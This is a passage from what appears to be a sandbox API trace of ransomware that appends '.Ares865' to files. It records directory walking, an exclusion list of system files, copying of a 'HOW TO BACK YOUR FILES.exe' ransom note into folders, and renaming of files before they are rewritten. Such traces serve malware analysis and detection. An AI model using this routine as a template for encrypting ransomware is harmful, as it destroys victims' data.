(lpString1="CodeFile.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.669] lstrcmpiW (lpString1="CodeFile.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.669] lstrcmpiW (lpString1="CodeFile.zip.Ares865", lpString2=".") returned 1 [0128.669] lstrcmpiW (lpString1="CodeFile.zip.Ares865", lpString2="..") returned 1 [0128.669] lstrcmpiW (lpString1="CodeFile.zip.Ares865", lpString2="windows") returned -1 [0128.669] lstrcmpiW (lpString1="CodeFile.zip.Ares865", lpString2="bootmgr") returned 1 [0128.669] lstrcmpiW (lpString1="CodeFile.zip.Ares865", lpString2="temp") returned -1 [0128.669] lstrcmpiW (lpString1="CodeFile.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.669] lstrcmpiW (lpString1="CodeFile.zip.Ares865", lpString2="boot") returned 1 [0128.669] lstrcmpiW (lpString1="CodeFile.zip.Ares865", lpString2="ids.txt") returned -1 [0128.669] lstrcmpiW (lpString1="CodeFile.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.670] lstrcmpiW (lpString1="CodeFile.zip.Ares865", lpString2="perflogs") returned -1 [0128.670] lstrcmpiW (lpString1="CodeFile.zip.Ares865", lpString2="MSBuild") returned -1 [0128.670] lstrlenW (lpString="CodeFile.zip.Ares865") returned 20 [0128.670] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Class.zip.Ares865") returned 109 [0128.670] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="CodeFile.zip.Ares865" | out: lpString1="CodeFile.zip.Ares865") returned="CodeFile.zip.Ares865" [0128.670] lstrlenW (lpString="CodeFile.zip.Ares865") returned 20 [0128.670] lstrlenW (lpString="Ares865") returned 7 [0128.670] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.670] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10fa9fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x527a7f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x7a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DataSet.zip.Ares865", cAlternateFileName="DATASE~1.ARE")) returned 1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2=".") returned 1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2="..") returned 1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2="windows") returned -1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2="bootmgr") returned 1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2="temp") returned -1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2="boot") returned 1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2="ids.txt") returned -1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2="perflogs") returned -1 [0128.670] lstrcmpiW (lpString1="DataSet.zip.Ares865", lpString2="MSBuild") returned -1 [0128.670] lstrlenW (lpString="DataSet.zip.Ares865") returned 19 [0128.670] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip.Ares865") returned 112 [0128.670] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="DataSet.zip.Ares865" | out: lpString1="DataSet.zip.Ares865") returned="DataSet.zip.Ares865" [0128.670] lstrlenW (lpString="DataSet.zip.Ares865") returned 19 [0128.670] lstrlenW (lpString="Ares865") returned 7 [0128.670] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.670] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10ff6270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x527ce060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EmptyDatabase.zip.Ares865", cAlternateFileName="EMPTYD~1.ARE")) returned 1 [0128.670] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.670] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.670] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2=".") returned 1 [0128.670] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="..") returned 1 [0128.671] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="windows") returned -1 [0128.671] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="bootmgr") returned 1 [0128.671] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="temp") returned -1 [0128.671] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.671] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="boot") returned 1 [0128.671] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="ids.txt") returned -1 [0128.671] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.671] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="perflogs") returned -1 [0128.671] lstrcmpiW (lpString1="EmptyDatabase.zip.Ares865", lpString2="MSBuild") returned -1 [0128.671] lstrlenW (lpString="EmptyDatabase.zip.Ares865") returned 25 [0128.671] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\DataSet.zip.Ares865") returned 111 [0128.671] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="EmptyDatabase.zip.Ares865" | out: lpString1="EmptyDatabase.zip.Ares865") returned="EmptyDatabase.zip.Ares865" [0128.671] lstrlenW (lpString="EmptyDatabase.zip.Ares865") returned 25 [0128.671] lstrlenW (lpString="Ares865") returned 7 [0128.671] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.671] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x1101c3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x527ce060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x890, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Form.zip.Ares865", cAlternateFileName="FORMZI~1.ARE")) returned 1 [0128.671] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.671] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.671] lstrcmpiW (lpString1="Form.zip.Ares865", lpString2=".") returned 1 [0128.672] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="Form.zip.Ares865" | out: lpString1="Form.zip.Ares865") returned="Form.zip.Ares865" [0128.672] lstrlenW (lpString="Form.zip.Ares865") returned 16 [0128.672] lstrlenW (lpString="Ares865") returned 7 [0128.672] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.672] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x526e9820, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x526e9820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.672] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.672] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x1101c3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x527f41c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x610, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Interface.zip.Ares865", cAlternateFileName="INTERF~1.ARE")) returned 1 [0128.672] lstrcmpiW (lpString1="Interface.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.672] lstrcmpiW (lpString1="Interface.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.672] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="Interface.zip.Ares865" | out: lpString1="Interface.zip.Ares865") returned="Interface.zip.Ares865" [0128.672] lstrlenW (lpString="Interface.zip.Ares865") returned 21 [0128.672] lstrlenW (lpString="Ares865") returned 7 [0128.672] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.672] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x1101c3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5281a320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3a20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MDIParent.zip.Ares865", cAlternateFileName="MDIPAR~1.ARE")) returned 1 [0128.672] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.672] lstrcmpiW (lpString1="MDIParent.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.672] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="MDIParent.zip.Ares865" | out: lpString1="MDIParent.zip.Ares865") returned="MDIParent.zip.Ares865" [0128.672] lstrlenW (lpString="MDIParent.zip.Ares865") returned 21 [0128.672] lstrlenW (lpString="Ares865") returned 7 [0128.672] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.672] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x11100c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5281a320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Resource.zip.Ares865", cAlternateFileName="RESOUR~1.ARE")) returned 1 [0128.672] lstrcmpiW (lpString1="Resource.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.672] lstrcmpiW (lpString1="Resource.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.673] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="Resource.zip.Ares865" | out: lpString1="Resource.zip.Ares865") returned="Resource.zip.Ares865" [0128.673] lstrlenW (lpString="Resource.zip.Ares865") returned 20 [0128.673] lstrlenW (lpString="Ares865") returned 7 [0128.673] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.673] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x11100c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5281a320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ResourceInternal.zip.Ares865", cAlternateFileName="RESOUR~2.ARE")) returned 1 [0128.673] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.673] lstrcmpiW (lpString1="ResourceInternal.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.673] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="ResourceInternal.zip.Ares865" | out: lpString1="ResourceInternal.zip.Ares865") returned="ResourceInternal.zip.Ares865" [0128.673] lstrlenW (lpString="ResourceInternal.zip.Ares865") returned 28 [0128.673] lstrlenW (lpString="Ares865") returned 7 [0128.673] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.673] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x11100c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52840480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x6c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings.zip.Ares865", cAlternateFileName="SETTIN~1.ARE")) returned 1 [0128.673] lstrcmpiW (lpString1="Settings.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.673] lstrcmpiW (lpString1="Settings.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.673] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="Settings.zip.Ares865" | out: lpString1="Settings.zip.Ares865") returned="Settings.zip.Ares865" [0128.673] lstrlenW (lpString="Settings.zip.Ares865") returned 20 [0128.673] lstrlenW (lpString="Ares865") returned 7 [0128.673] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.673] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x11100c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52840480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x6e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SettingsInternal.zip.Ares865", cAlternateFileName="SETTIN~2.ARE")) returned 1 [0128.673] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.674] lstrcmpiW (lpString1="SettingsInternal.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.674] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="SettingsInternal.zip.Ares865" | out: lpString1="SettingsInternal.zip.Ares865") returned="SettingsInternal.zip.Ares865" [0128.674] lstrlenW (lpString="SettingsInternal.zip.Ares865") returned 28 [0128.674] lstrlenW (lpString="Ares865") returned 7 [0128.674] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.674] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x111e5450, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x528665e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x530, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TextFile.zip.Ares865", cAlternateFileName="TEXTFI~1.ARE")) returned 1 [0128.674] lstrcmpiW (lpString1="TextFile.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.674] lstrcmpiW (lpString1="TextFile.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.674] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="TextFile.zip.Ares865" | out: lpString1="TextFile.zip.Ares865") returned="TextFile.zip.Ares865" [0128.674] lstrlenW (lpString="TextFile.zip.Ares865") returned 20 [0128.674] lstrlenW (lpString="Ares865") returned 7 [0128.674] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.674] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x528665e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x8a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserControl.zip.Ares865", cAlternateFileName="USERCO~1.ARE")) returned 1 [0128.674] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.674] lstrcmpiW (lpString1="UserControl.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.674] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="UserControl.zip.Ares865" | out: lpString1="UserControl.zip.Ares865") returned="UserControl.zip.Ares865" [0128.674] lstrlenW (lpString="UserControl.zip.Ares865") returned 23 [0128.674] lstrlenW (lpString="Ares865") returned 7 [0128.674] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.675] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x528665e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x860, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Visualizer.zip.Ares865", cAlternateFileName="VISUAL~1.ARE")) returned 1 [0128.675] lstrcmpiW (lpString1="Visualizer.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.675] lstrcmpiW (lpString1="Visualizer.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.675] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="Visualizer.zip.Ares865" | out: lpString1="Visualizer.zip.Ares865") returned="Visualizer.zip.Ares865" [0128.675] lstrlenW (lpString="Visualizer.zip.Ares865") returned 22 [0128.675] lstrlenW (lpString="Ares865") returned 7 [0128.675] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.675] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x11231710, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5288c740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XmlFile.zip.Ares865", cAlternateFileName="XMLFIL~1.ARE")) returned 1 [0128.675] lstrcmpiW (lpString1="XmlFile.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.675] lstrcmpiW (lpString1="XmlFile.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.675] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="XmlFile.zip.Ares865" | out: lpString1="XmlFile.zip.Ares865") returned="XmlFile.zip.Ares865" [0128.675] lstrlenW (lpString="XmlFile.zip.Ares865") returned 19 [0128.675] lstrlenW (lpString="Ares865") returned 7 [0128.675] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.675] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x11231710, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5288c740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XmlFile.zip.Ares865", cAlternateFileName="XMLFIL~1.ARE")) returned 0 [0128.675] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.675] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79d0 [0128.675] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies" [0128.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x321070 | out: hHeap=0x2b0000) returned 1 [0128.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0128.675] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies") returned 77 [0128.675] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies" [0128.676] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.676] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.677] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.677] GetLastError () returned 0x0 [0128.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0128.677] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0128.677] CloseHandle (hObject=0x120) returned 1 [0128.677] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0128.677] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.677] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52694b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5288c740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5288c740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.677] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.677] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.678] lstrcpyW (in: lpString1=0x2cce49c, lpString2="Microsoft.VisualStudio.Tools.Applications.Adapter.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.Adapter.dll") returned="Microsoft.VisualStudio.Tools.Applications.Adapter.dll" [0128.678] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Adapter.dll") returned 53 [0128.678] lstrlenW (lpString="Ares865") returned 7 [0128.678] lstrcmpiW (lpString1="ter.dll", lpString2="Ares865") returned 1 [0128.678] lstrlenW (lpString=".dll") returned 4 [0128.678] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.Adapter.dll", lpString2=".dll") returned 1 [0128.678] lstrlenW (lpString=".lnk") returned 4 [0128.678] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.Adapter.dll", lpString2=".lnk") returned 1 [0128.678] lstrlenW (lpString=".ini") returned 4 [0128.678] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.Adapter.dll", lpString2=".ini") returned 1 [0128.678] lstrlenW (lpString=".sys") returned 4 [0128.678] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.Adapter.dll", lpString2=".sys") returned 1 [0128.678] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Adapter.dll") returned 53 [0128.679] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll.Ares865") returned 139 [0128.679] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.adapter.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.adapter.dll.ares865"), dwFlags=0x1) returned 1 [0128.692] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.Adapter.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.adapter.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.692] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=210848) returned 1 [0128.692] RtlAllocateHeap 